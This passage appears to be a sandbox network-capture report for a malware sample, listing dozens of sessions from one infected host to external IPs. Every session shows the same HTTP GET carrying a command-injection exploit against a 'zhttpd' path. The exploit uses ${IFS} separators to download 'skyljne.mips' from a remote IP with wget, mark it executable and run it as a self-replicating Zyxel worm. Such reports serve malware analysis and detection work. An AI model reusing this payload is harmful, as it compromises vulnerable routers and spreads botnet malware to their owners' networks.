                                        Jan 14, 2024 16:18:48.536670923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5151192.168.2.1339488192.34.108.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536710024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5152192.168.2.135235642.226.162.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536762953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5153192.168.2.1349750200.182.59.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536777020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5154192.168.2.135725881.18.195.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536803961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5155192.168.2.1353716120.176.187.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536834002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5156192.168.2.1337640176.59.26.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536892891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5157192.168.2.134156019.175.135.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536940098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5158192.168.2.13456382.48.161.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536988974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5159192.168.2.1337774161.181.214.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536998987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5160192.168.2.133985843.192.75.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537041903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5161192.168.2.135462237.99.37.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537075043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5162192.168.2.1348376184.42.48.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537122965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5163192.168.2.1345448137.64.170.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537170887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5164192.168.2.1357228187.183.9.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537210941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5165192.168.2.133639641.246.248.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537264109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5166192.168.2.1347324174.231.58.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537306070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5167192.168.2.1333482145.26.19.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537332058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5168192.168.2.1353424161.240.219.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537384987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5169192.168.2.1348480158.49.14.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537447929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5170192.168.2.1355090223.43.62.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537487030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5171192.168.2.135992241.99.252.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537514925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5172192.168.2.134860245.144.93.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537576914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5173192.168.2.134897631.220.70.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537617922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5174192.168.2.1359658119.124.72.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537642002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5175192.168.2.1344554177.62.244.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537682056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5176192.168.2.1356932138.188.153.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537720919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5177192.168.2.135190649.124.233.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537764072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5178192.168.2.1348364170.119.191.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537794113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5179192.168.2.1347098112.204.242.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537841082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5180192.168.2.133510049.42.42.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537872076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5181192.168.2.135282650.156.136.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537902117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5182192.168.2.1335536158.8.163.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.537941933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5183192.168.2.1359078216.127.37.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538028955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5184192.168.2.1353268109.208.111.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538058996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5185192.168.2.133422666.178.17.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538085938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5186192.168.2.1356070137.164.210.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538127899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5187192.168.2.1336170169.150.52.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538171053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5188192.168.2.1340838154.25.19.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538208008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5189192.168.2.134059648.118.249.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538253069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5190192.168.2.1349134124.67.107.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538290977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5191192.168.2.1341486176.182.104.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538330078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5192192.168.2.135697819.165.107.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538377047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5193192.168.2.1346952106.129.1.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538399935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5194192.168.2.1340150192.56.230.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538454056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5195192.168.2.1349922108.125.136.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538467884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5196192.168.2.135432031.134.11.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538517952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5197192.168.2.1344220155.250.199.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538589954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5198192.168.2.134885092.116.159.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538604975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5199192.168.2.1347808130.143.121.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538635969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5200192.168.2.134260893.101.248.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538666964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5201192.168.2.1352784211.50.214.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538711071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5202192.168.2.1351904201.243.87.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538754940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5203192.168.2.1348790107.90.36.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538785934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5204192.168.2.1359876110.8.243.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538822889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5205192.168.2.135288284.114.249.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538850069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5206192.168.2.133281296.227.163.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538877964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5207192.168.2.135486864.122.80.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538916111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5208192.168.2.135220435.73.5.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.538945913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5209192.168.2.133931477.129.209.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539081097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5210192.168.2.133649623.96.188.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539083958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5211192.168.2.1337628200.83.166.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539084911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5212192.168.2.135738887.157.19.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.539084911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5213192.168.2.135863237.8.137.247443
                                        TimestampBytes transferredDirectionData
